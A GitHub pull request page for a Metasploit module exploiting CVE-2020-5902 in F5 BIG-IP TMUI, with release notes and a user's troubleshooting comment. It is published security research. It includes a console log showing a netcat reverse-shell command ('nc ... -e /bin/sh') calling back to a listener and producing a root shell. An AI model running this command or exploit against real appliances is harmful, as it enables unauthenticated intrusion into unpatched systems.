Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) #13807

Merged: smcintyre-r7 merged 10 commits into rapid7:master from wvu:feature/f5 on Jul 7, 2020

wvu commented Jul 5, 2020

Merged: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

If you're coming here from the Internet, please use the version in master (linked above), not the original commit. Thank you! See also: #13854 and #14003.

This module should get you a Unix root shell on an affected F5 BIG-IP if all goes well. This is NOT TMSH. It just goes through it. You may need to run the exploit a couple times until I fix the bugs.

msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[+] nc 172.16.163.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.163.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux

wvu added the blocked (Blocked by one or more additional tasks), feature, needs-docs and external modules (PRs dealing with modules run as their own process) labels Jul 5, 2020

label-actions bot commented Jul 5, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

wvu marked this pull request as draft July 5, 2020 20:30
wvu removed the needs-docs label Jul 6, 2020
wvu marked this pull request as ready for review July 7, 2020 17:07
wvu changed the title from "[WIP] Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902)" to "Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902)" Jul 7, 2020
wvu removed the blocked (Blocked by one or more additional tasks) label Jul 7, 2020
wvu added the module label and removed the external modules (PRs dealing with modules run as their own process) label Jul 7, 2020
smcintyre-r7 self-assigned this Jul 7, 2020
smcintyre-r7 merged commit 16ff439 into rapid7:master Jul 7, 2020

smcintyre-r7 commented Jul 7, 2020

Release Notes

The F5 BIG-IP TMUI Directory Traversal and File Upload RCE module exploits a directory traversal vulnerability within the F5 BIG-IP appliance, identified as CVE-2020-5902. The vulnerability is unauthenticated and can be leveraged to obtain remote code execution.

wvu deleted the feature/f5 branch July 7, 2020 17:46
tperry-r7 added the rn-modules (release notes for new or majorly enhanced modules) label Jul 9, 2020
wvu added the docs label Jul 17, 2020
@hackercoolmagz

I am getting stuck at
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash

while running the exploit. Any solution please. I have used the exact payload and set the target to 0 (Unix).
